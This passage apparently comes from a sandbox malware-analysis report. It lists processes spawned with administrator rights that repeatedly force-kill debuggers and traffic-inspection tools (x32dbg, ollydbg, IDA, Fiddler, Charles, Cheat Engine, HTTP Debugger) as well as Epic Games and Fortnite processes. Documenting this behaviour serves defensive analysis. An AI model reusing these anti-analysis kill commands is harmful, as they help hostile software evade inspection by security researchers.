                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:104
                                                                                                                                                                                                                                                                                    Start time:12:20:27
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:105
                                                                                                                                                                                                                                                                                    Start time:12:20:27
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:106
                                                                                                                                                                                                                                                                                    Start time:12:20:27
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:108
                                                                                                                                                                                                                                                                                    Start time:12:20:28
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:109
                                                                                                                                                                                                                                                                                    Start time:12:20:28
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:110
                                                                                                                                                                                                                                                                                    Start time:12:20:28
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:111
                                                                                                                                                                                                                                                                                    Start time:12:20:28
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:112
                                                                                                                                                                                                                                                                                    Start time:12:20:29
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:113
                                                                                                                                                                                                                                                                                    Start time:12:20:29
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:114
                                                                                                                                                                                                                                                                                    Start time:12:20:29
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:115
                                                                                                                                                                                                                                                                                    Start time:12:20:29
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:116
                                                                                                                                                                                                                                                                                    Start time:12:20:29
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:117
                                                                                                                                                                                                                                                                                    Start time:12:20:29
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:118
                                                                                                                                                                                                                                                                                    Start time:12:20:29
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:119
                                                                                                                                                                                                                                                                                    Start time:12:20:29
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:120
                                                                                                                                                                                                                                                                                    Start time:12:20:29
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:121
                                                                                                                                                                                                                                                                                    Start time:12:20:29
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:122
                                                                                                                                                                                                                                                                                    Start time:12:20:30
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:123
                                                                                                                                                                                                                                                                                    Start time:12:20:30
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:124
                                                                                                                                                                                                                                                                                    Start time:12:20:30
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:125
                                                                                                                                                                                                                                                                                    Start time:12:20:30
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:126
                                                                                                                                                                                                                                                                                    Start time:12:20:30
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff72ae50000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:127
                                                                                                                                                                                                                                                                                    Start time:12:20:30
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:128
                                                                                                                                                                                                                                                                                    Start time:12:20:31
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:129
                                                                                                                                                                                                                                                                                    Start time:12:20:31
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:130
                                                                                                                                                                                                                                                                                    Start time:12:20:31
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:131
                                                                                                                                                                                                                                                                                    Start time:12:20:31
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:132
                                                                                                                                                                                                                                                                                    Start time:12:20:31
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:133
                                                                                                                                                                                                                                                                                    Start time:12:20:31
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:134
                                                                                                                                                                                                                                                                                    Start time:12:20:32
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:135
                                                                                                                                                                                                                                                                                    Start time:12:20:32
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:136
                                                                                                                                                                                                                                                                                    Start time:12:20:32
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:137
                                                                                                                                                                                                                                                                                    Start time:12:20:32
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:138
                                                                                                                                                                                                                                                                                    Start time:12:20:32
